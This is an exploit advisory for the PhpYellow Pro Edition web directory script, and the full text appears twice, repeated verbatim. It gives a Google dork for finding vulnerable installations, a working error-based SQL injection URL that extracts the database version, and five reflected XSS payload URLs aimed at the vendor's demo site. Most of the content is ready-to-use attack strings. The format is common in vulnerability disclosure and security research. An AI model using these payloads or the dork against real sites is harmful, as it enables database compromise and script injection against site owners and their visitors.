##########################################
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
# Error Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
# Error Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information